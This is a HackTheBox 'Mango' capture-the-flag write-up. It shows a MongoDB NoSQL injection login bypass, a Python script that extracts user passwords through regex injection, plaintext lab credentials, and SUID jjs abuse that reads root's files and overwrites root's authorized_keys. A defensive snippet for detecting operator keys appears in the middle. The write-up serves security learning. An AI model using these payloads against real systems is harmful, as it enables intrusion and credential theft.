HackTheBox - Mango 🥭🥭



Quick Summary

→ Another awesome machine. "Mango" is a medium-difficulty box that is vulnerable to a NoSQL injection attack. I was stuck on the main page and the analytics page for an hour until I realized they were only a rabbit hole. There was a login page at staging-order.mango.htb, a hostname that appeared in my NMAP scan. From the forum I found out that the web app uses MongoDB; searching Google for "Mango db" leads to MongoDB, a database program classified as a NoSQL database.
Using a payload from PayloadAllTheThings I managed to bypass the login page, but once in I was redirected to an "Under Plantation" page that was another rabbit hole. That was fine, because I now knew the machine was vulnerable to NoSQL injection. With my Python script I extracted the credentials for the users mango and admin, logged in to the machine via SSH and got user.txt.
In the privilege escalation part there was vulnerable software installed: jjs, a Java command-line tool used to invoke the Nashorn engine. You can use it to interpret one or several script files, or to run an interactive shell.
I abused the vulnerability by reading root.txt and also by injecting my own SSH key, then logged in to the machine and got the administrator shell.


Penetration Testing Methodologies

  1. Network Scanning

    → Nmap scan

    → discover open ports and which services are running

  2. Enumeration

    → Browsing the HTTP service

    → Exploring the Analytics page

    → check the SSL certificate of the web app

  3. Post - Exploitation

    → Trying to bypass the login page at staging-order.mango.htb

    → with this payload from PayloadAllTheThings - NoSQL Injection Attack I managed to bypass the login

  4. Exploitation

    → brute-force the credentials of the users mango and admin using a Python script

    → After a few minutes I finally got both credentials; log in with SSH and get user.txt

  5. Privilege Escalation

    → execute LinEnum.sh to see what we can do on the machine

    → look at which permissions the user admin has

    → found the vulnerable software: jjs

    → with the help of GTFOBins - jjs I can execute the file-read command to get root.txt

    → I can also inject SSH keys with the file-write command

    → Log in with my generated SSH keys and become the administrator.


Network Scanning

Walkthrough

→ I always begin with NMAP to see which services are running. I always use:


  • -sV ⇒ Probe open ports to determine service/version info
  • -sC ⇒ equivalent to --script=default
  • -T 0-5 ⇒ Set timing template - higher is faster (less accurate)
  • -A ⇒ Aggressive scan (OS detection, version detection, script scanning and traceroute)
  • -oN ⇒ save our scan results to a text file

# bash

nmap -sV -sC -A -T4 10.10.10.162 -oN nmap-Mango


# bash

root in htb/boxes/Mango
❯ nmap -sV -sC -A 10.10.10.162 -oN nmap-Mango
Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-19 05:31 PST
Nmap scan report for 10.10.10.162
Host is up (0.21s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 a8:8f:d9:6f:a6:e4:ee:56:e3:ef:54:54:6d:56:0c:f5 (RSA)
| 256 6a:1c:ba:89:1e:b0:57:2f:fe:63:e1:61:72:89:b4:cf (ECDSA)
|_ 256 90:70:fb:6f:38:ae:dc:3b:0b:31:68:64:b0:4e:7d:c9 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: 403 Forbidden
443/tcp open ssl/http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Mango | Search Base
| ssl-cert: Subject: commonName=staging-order.mango.htb/organizationName=Mango Prv Ltd./stateOrProvinceName=None/countryName=IN
| Not valid before: 2019-09-27T14:21:19
|_Not valid after: 2020-09-26T14:21:19
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
|_ http/1.1
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=4%D=4/19%OT=22%CT=1%CU=30519%PV=Y%DS=2%DC=T%G=Y%TM=5E9B71D
OS:5%P=x86_64-pc-linux-gnu)SEQ(SP=102%GCD=1%ISR=109%TI=Z%CI=Z%II=I%TS=A)OPS
OS:(O1=M54DST11NW7%O2=M54DST11NW7%O3=M54DNNT11NW7%O4=M54DST11NW7%O5=M54DST1
OS:1NW7%O6=M54DST11)WIN(W1=7120%W2=7120%W3=7120%W4=7120%W5=7120%W6=7120)ECN
OS:(R=Y%DF=Y%T=40%W=7210%O=M54DNNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=A
OS:S%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R
OS:=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F
OS:=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%
OS:T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD
OS:=S)

Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 8888/tcp)
HOP RTT ADDRESS
1 209.53 ms 10.10.14.1
2 216.74 ms 10.10.10.162

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 47.79 seconds

root in htb/boxes/Mango took 48s



Nmap results

So there are three ports open.

  • 22 ⇒ SSH
  • 80 ⇒ a website running over HTTP
  • 443 ⇒ HTTPS, whose SSL certificate names "staging-order.mango.htb"; I added that hostname to my /etc/hosts file.


Enumeration

Mango Website

Normally I explore the website first, because that will give us interesting stuff, so:

The main page looks like a Google search, right? At first I didn't realize that the main page is a hint for this machine; I will explain that later.

Next I clicked on the Analytics tab:

This page is a complete rabbit hole; I couldn't do anything with the website, so I checked the SSL certificate. It was registered to staging-order.mango.htb, so I added that to my /etc/hosts file.

After that I visited staging-order.mango.htb and it was a login page.


Post - Exploitation

Bypass Login

I mentioned that the main page looks like a Google search; I realized that was a hint about what to do in this phase. From the forum I knew it was a database, and the name MANGO is a big hint, so I searched Google for "Mango DB" and got MongoDB, which is a NoSQL database program.

So I searched for NoSQL injection attacks and found this. I tried to log in with some credentials, used Burp Suite to intercept the request, and then modified the request body parameters based on the payload:

# Burp Suite Repeater

POST / HTTP/1.1
Host: staging-order.mango.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://staging-order.mango.htb/index.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 53
DNT: 1
Connection: close
Cookie: PHPSESSID=9rr8f4ht86hjj17q1vkrlhskfb
Upgrade-Insecure-Requests: 1

username[$ne]=payas0&password[$ne]=payas0&login=login

I modified the username and password parameters by adding [$ne] (MongoDB's "not equal" operator). Sending this returns HTTP/1.1 200 OK:

# Burp Suite Repeater

HTTP/1.1 200 OK
Date: Sat, 18 Apr 2020 22:22:28 GMT
Server: Apache/2.4.29 (Ubuntu)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 3380
Connection: close
Content-Type: text/html; charset=UTF-8

Following the redirect leads to /home.php:

# Burp Suite Repeater

GET /home.php HTTP/1.1
Host: staging-order.mango.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://staging-order.mango.htb/index.php
DNT: 1
Connection: close
Cookie: PHPSESSID=9rr8f4ht86hjj17q1vkrlhskfb
Upgrade-Insecure-Requests: 1

Under Plantation

When I finally bypassed the login it took me to the Under Plantation page:

As you can see on the page there is a user, admin@mango.htb, so I kept that in mind.
Now that I was in, I tried to brute-force the site under /home.php, but that was not really helpful; this page is a rabbit hole again. Still, I had the username admin and already knew the app was vulnerable to NoSQL injection.


Exploitation

NoSQL Injection

I searched for MongoDB NoSQL injection attacks and luckily found this article, which is about extracting the admin password from the database using NoSQL injection.

So I wrote a Python script that automates the password extraction, similar to the article. This needs patience, because the password is revealed one character at a time:

# python

import requests
import urllib3
import string
urllib3.disable_warnings()  # the target uses a self-signed certificate

username = "mango"
password = ""
u = "http://staging-order.mango.htb"  # Enter the url here
headers = {'content-type': 'application/x-www-form-urlencoded', 'staging-order.mango.htb': ''}

while True:
    found = False
    for c in string.printable:
        # skip regex metacharacters, which would change the meaning of the pattern
        if c not in ['*', '+', '.', '?', '|', '&', '\\']:
            # password[$regex]=^<known prefix><candidate>.* : a 302 redirect means the prefix matches
            payload = 'username=%s&password[$regex]=^%s.*&login=login' % (username, password + c)
            r = requests.post(u, data=payload, headers=headers, verify=False, allow_redirects=False)
            #print(payload)
            #print(r.status_code)
            if r.status_code == 302:
                print("Found one more char : %s" % (password + c))
                password += c
                found = True
    if not found:  # no character extended the prefix, so the password is complete
        print("Password: %s" % password)
        break
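The `[$ne]` and `[$regex]` bodies above work because PHP turns `password[$regex]=...` into a nested array that is passed straight into the MongoDB filter. As an added defensive example (not code from the writeup), here is a small check that parses a form body the way PHP does, flags any `$`-prefixed key, and builds the login filter only from plain strings. The parser and function names are my own; the sample bodies are constructed from the two payload shapes used on this page.

```python
import re
from urllib.parse import parse_qsl

# Unsafe pattern behind this login bypass (illustrative PHP, not the box's real source):
#   $users->findOne(['username' => $_POST['username'], 'password' => $_POST['password']]);
# PHP turns "username[$ne]=x" into ['username' => ['$ne' => 'x']], so the operator
# lands inside the MongoDB filter unchanged.

OPERATOR_KEY = re.compile(r"^\$")                      # MongoDB operators all start with '$'
NESTED_KEY = re.compile(r"([^\[\]]+)\[([^\[\]]*)\]")  # name[sub]


def parse_php_form(body: str) -> dict:
    """Parse a urlencoded body into nested dicts the way PHP builds $_POST (one level only)."""
    form = {}
    for key, value in parse_qsl(body, keep_blank_values=True):
        m = NESTED_KEY.fullmatch(key)
        if m:
            name, sub = m.group(1), m.group(2)
            form.setdefault(name, {})
            if isinstance(form[name], dict):
                form[name][sub] = value
        else:
            form[key] = value
    return form


def find_operator_keys(value, path="") -> list:
    """Return dotted paths of every key starting with '$' anywhere in the parsed body."""
    found = []
    if isinstance(value, dict):
        for k, v in value.items():
            p = f"{path}.{k}" if path else k
            if OPERATOR_KEY.match(k):
                found.append(p)
            found.extend(find_operator_keys(v, p))
    return found


def build_login_filter(form: dict) -> dict:
    """Hardened filter: credentials must be plain strings, so no operator can reach the query.
    (A real app would compare a password hash; the literal filter mirrors the page's app.)"""
    username, password = form.get("username"), form.get("password")
    if not isinstance(username, str) or not isinstance(password, str):
        raise ValueError("username and password must be plain strings, not arrays")
    return {"username": username, "password": password}


def check_request(body: str) -> dict:
    """Classify one login body: parsed form, operator paths found, and whether to reject it."""
    form = parse_php_form(body)
    ops = find_operator_keys(form)
    return {"form": form, "operators": ops, "reject": bool(ops)}


if __name__ == "__main__":
    # Constructed sample bodies: the two payload shapes from this writeup plus a benign login.
    for body in ("username[$ne]=payas0&password[$ne]=payas0&login=login",
                 "username=mango&password[$regex]=^h.*&login=login",
                 "username=mango&password=hunter2&login=login"):
        print(body, "->", check_request(body)["operators"] or "clean")
```

Logging the `operators` list per request also gives a simple detection signal: the extraction script above produces hundreds of bodies containing `password.$regex` in a few minutes.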

Get user shell

After almost 10 minutes I finished extracting the password of user mango:

# bash

mango: h3mXK8RhU~f{]f5H

Now I log in over SSH with this password and finally have an initial shell:

# bash

root in htb/boxes/Mango via 🐍 v2.7.17
❯ ssh mango@10.10.10.162
The authenticity of host '10.10.10.162 (10.10.10.162)' can't be established.
ECDSA key fingerprint is SHA256:AhHG3k5r1ic/7nEKLWHXoNm0m28uM9W8heddb9lCTm0.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.162' (ECDSA) to the list of known hosts.
mango@10.10.10.162's password:
Welcome to Ubuntu 18.04.2 LTS (GNU/Linux 4.15.0-64-generic x86_64)

* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage

System information as of Sat Apr 18 22:39:50 UTC 2020

System load: 0.01 Processes: 103
Usage of /: 25.9% of 19.56GB Users logged in: 0
Memory usage: 11% IP address for ens33: 10.10.10.162
Swap usage: 3%


* Canonical Livepatch is available for installation.
- Reduce system reboots and improve kernel security. Activate at:
https://ubuntu.com/livepatch

122 packages can be updated.
18 updates are security updates.

Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


Last login: Sat Apr 18 21:49:56 2020 from 10.10.14.192
mango@mango:~$

I thought I could now get user.txt, until I remembered the other user I saw on the Under Plantation page: admin. So next I extracted that password too with my Python script, changing only the line username="mango" to username="admin", and ran it again:

# python

import requests
import urllib3
import string
urllib3.disable_warnings()  # the target uses a self-signed certificate

username = "admin"  # enter the username
password = ""
u = "http://staging-order.mango.htb"  # Enter the url here
headers = {'content-type': 'application/x-www-form-urlencoded', 'staging-order.mango.htb': ''}

while True:
    found = False
    for c in string.printable:
        # skip regex metacharacters, which would change the meaning of the pattern
        if c not in ['*', '+', '.', '?', '|', '&', '\\']:
            # password[$regex]=^<known prefix><candidate>.* : a 302 redirect means the prefix matches
            payload = 'username=%s&password[$regex]=^%s.*&login=login' % (username, password + c)
            r = requests.post(u, data=payload, headers=headers, verify=False, allow_redirects=False)
            #print(payload)
            #print(r.status_code)
            if r.status_code == 302:
                print("Found one more char : %s" % (password + c))
                password += c
                found = True
    if not found:  # no character extended the prefix, so the password is complete
        print("Password: %s" % password)
        break

After 10 minutes the admin password was complete:

# bash

admin: t9KcS3>!0B#2

Now, from the mango shell, I just switch user and finally get user.txt:

# bash

mango@mango:~$ su admin
Password:
$ id
uid=4000000000(admin) gid=1001(admin) groups=1001(admin)
$ ls
exploit.sh leon.sh
$ /bin/bash -i
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.

admin@mango:/home/mango$ cd ..
admin@mango:/home$ ls
admin mango
admin@mango:/home$ cd admin
admin@mango:/home/admin$ ls
user.txt
admin@mango:/home/admin$ cat user.txt
79bf3[---------------------]47e92
admin@mango:/home/admin$


Privilege Escalation

JJS Exploitation

For the privilege escalation phase I used LinEnum.sh to look for things I could use to get the administrator shell.

So from my Kali Linux machine I transferred LinEnum to the target and executed it.

As always, it first shows basic information about the machine.

# bash

admin@mango:/tmp$ bash LinEnum.sh

#########################################################
# Local Linux Enumeration & Privilege Escalation Script #
#########################################################
# www.rebootuser.com
# version 0.982

[-] Debug Info
[+] Thorough tests = Disabled


Scan started at:
Sat Apr 18 22:52:10 UTC 2020


### SYSTEM ##############################################
[-] Kernel information:
Linux mango 4.15.0-64-generic #73-Ubuntu SMP Thu Sep 12 13:16:13 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux


[-] Kernel information (continued):
Linux version 4.15.0-64-generic (buildd@lgw01-amd64-038) (gcc version 7.4.0 (Ubuntu 7.4.0-1ubuntu1~18.04.1)) #73-Ubuntu SMP Thu Sep 12 13:16:13 UTC 2019


[-] Specific release information:
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=18.04
DISTRIB_CODENAME=bionic
DISTRIB_DESCRIPTION="Ubuntu 18.04.2 LTS"
NAME="Ubuntu"
VERSION="18.04.2 LTS (Bionic Beaver)"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu 18.04.2 LTS"
VERSION_ID="18.04"
HOME_URL="https://www.ubuntu.com/"
SUPPORT_URL="https://help.ubuntu.com/"
BUG_REPORT_URL="https://bugs.launchpad.net/ubuntu/"
PRIVACY_POLICY_URL="https://www.ubuntu.com/legal/terms-and-policies/privacy-policy"
VERSION_CODENAME=bionic
UBUNTU_CODENAME=bionic


[-] Hostname:
mango


### USER/GROUP ##########################################
[-] Current user/group info:
uid=4000000000(admin) gid=1001(admin) groups=1001(admin)


[-] Users that have previously logged onto the system:
Username Port From Latest
root pts/1 10.10.14.247 Sat Apr 18 21:13:13 +0000 2020
mango pts/0 10.10.15.230 Sat Apr 18 22:39:51 +0000 2020


[-] Who else is logged on:
22:52:10 up 1:41, 1 user, load average: 0.01, 0.02, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
mango pts/0 10.10.15.230 22:39 2.00s 2.52s 0.01s sshd: mango [priv]

Going deeper into the recon, I saw something interesting: jjs is installed and SUID.

# bash

[+] Possibly interesting SUID files:
-rwsr-sr-- 1 root admin 10352 Jul 18 2019 /usr/lib/jvm/java-11-openjdk-amd64/bin/jjs

As you can see, jjs is SUID and owned by root. After the script finished running I also checked the other SUID binaries:

# bash

admin@mango:/home/mango$ find / -perm -4000 -user root 2>/dev/null
/bin/fusermount
/bin/mount
/bin/umount
/bin/su
/bin/ping
/snap/core/7713/bin/mount
/snap/core/7713/bin/ping
/snap/core/7713/bin/ping6
/snap/core/7713/bin/su
/snap/core/7713/bin/umount
/snap/core/7713/usr/bin/chfn
/snap/core/7713/usr/bin/chsh
/snap/core/7713/usr/bin/gpasswd
/snap/core/7713/usr/bin/newgrp
/snap/core/7713/usr/bin/passwd
/snap/core/7713/usr/bin/sudo
/snap/core/7713/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core/7713/usr/lib/openssh/ssh-keysign
/snap/core/7713/usr/lib/snapd/snap-confine
/snap/core/7713/usr/sbin/pppd
/snap/core/6350/bin/mount
/snap/core/6350/bin/ping
/snap/core/6350/bin/ping6
/snap/core/6350/bin/su
/snap/core/6350/bin/umount
/snap/core/6350/usr/bin/chfn
/snap/core/6350/usr/bin/chsh
/snap/core/6350/usr/bin/gpasswd
/snap/core/6350/usr/bin/newgrp
/snap/core/6350/usr/bin/passwd
/snap/core/6350/usr/bin/sudo
/snap/core/6350/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core/6350/usr/lib/openssh/ssh-keysign
/snap/core/6350/usr/lib/snapd/snap-confine
/snap/core/6350/usr/sbin/pppd
/usr/bin/newuidmap
/usr/bin/newgrp
/usr/bin/gpasswd
/usr/bin/passwd
/usr/bin/newgidmap
/usr/bin/run-mailcap
/usr/bin/chfn
/usr/bin/chsh
/usr/bin/sudo
/usr/bin/traceroute6.iputils
/usr/bin/pkexec
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/eject/dmcrypt-get-device
/usr/lib/jvm/java-11-openjdk-amd64/bin/jjs
/usr/lib/openssh/ssh-keysign
/usr/lib/snapd/snap-confine
admin@mango:/home/mango$

Get the root.txt

I got a hint from the forum that the privilege escalation part is on GTFOBins, so I went to the website and checked jjs:

According to GTFOBins, we can spawn an interactive shell with elevated permissions. I used the file-read one-liner to grab root.txt from the /root directory, and yes, I'm allowed to read it:


# java

admin@mango:/home/admin$ jjs
Warning: The jjs tool is planned to be removed from a future JDK release
jjs> var BufferedReader = Java.type("java.io.BufferedReader"); var FileReader = Java.type("java.io.FileReader"); var br = new BufferedReader(new FileReader("/root/root.txt")); while ((line = br.readLine()) != null) { print(line); }
8a8ef[---------------------]9ab15
jjs> exit()
admin@mango:/home/admin$

I also tried the SUID entry. When I execute it my terminal session hangs, but I do get the administrator shell:

# java

admin@mango:/home/mango$ echo "Java.type('java.lang.Runtime').getRuntime().exec('/bin/sh -pc \$@|sh\${IFS}-p _ echo sh -p <$(tty) >$(tty) 2>$(tty)').waitFor()" | jjs
Warning: The jjs tool is planned to be removed from a future JDK release
jjs> Java.type('java.lang.Runtime').getRuntime().exec('/bin/sh -pc $@|sh${IFS}-p _ echo sh -p </dev/pts/1 >/dev/pts/1 2>/dev/pts/1').waitFor()
#

Administrator Shell

I wasn't satisfied with this, because I wanted a proper administrator shell and to read root.txt again. I had only one option remaining: the file-write function.

So my idea was to inject an SSH key into the /root/.ssh/ directory and log in as root with my RSA key. First I generated my SSH keys with the command 'ssh-keygen -t rsa', then copied id_rsa.pub and echoed it into a file in the /tmp directory:

# bash

admin@mango:/home/mango$ echo "ssh-rsa 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 root@Payas0" > /tmp/ssh

And now overwrite root's authorized_keys file:

# bash

admin@mango:/home/mango$ echo "Java.type('java.lang.Runtime').getRuntime().exec('cp /tmp/ssh /root/.ssh/authorized_keys').waitFor()" | jjs
Warning: The jjs tool is planned to be removed from a future JDK release
jjs> Java.type('java.lang.Runtime').getRuntime().exec('cp /tmp/ssh /root/.ssh/authorized_keys').waitFor()
0
jjs>
admin@mango:/home/mango$

Now that everything is set up, I log in as root, get the last shell, and read root.txt again:

# bash

root in htb/boxes/Mango via 🐍 v2.7.17
❯ ssh -i /root/.ssh/id_rsa root@10.10.10.162
Welcome to Ubuntu 18.04.2 LTS (GNU/Linux 4.15.0-64-generic x86_64)

* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage

System information as of Sat Apr 18 23:40:32 UTC 2020

System load: 0.04 Processes: 114
Usage of /: 25.8% of 19.56GB Users logged in: 1
Memory usage: 11% IP address for ens33: 10.10.10.162
Swap usage: 4%

* Kata Containers are now fully integrated in Charmed Kubernetes 1.16!
Yes, charms take the Krazy out of K8s Kata Kluster Konstruction.

https://ubuntu.com/kubernetes/docs/release-notes

* Canonical Livepatch is available for installation.
- Reduce system reboots and improve kernel security. Activate at:
https://ubuntu.com/livepatch

122 packages can be updated.
18 updates are security updates.

Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


Last login: Sat Apr 18 23:25:35 2020 from 10.10.14.43
root@mango:~# id
uid=0(root) gid=0(root) groups=0(root)
root@mango:~# ls
root.txt
root@mango:~# cat root.txt
8a8ef[---------------------]9ab15
root@mango:~#


If you liked my writeup please leave a respect on my Profile

Payas0


References:

Extracting MongoDB password with NoSQL Injection

NoSQL Injection

Java gives a shell for everything

#GTFObins - JJS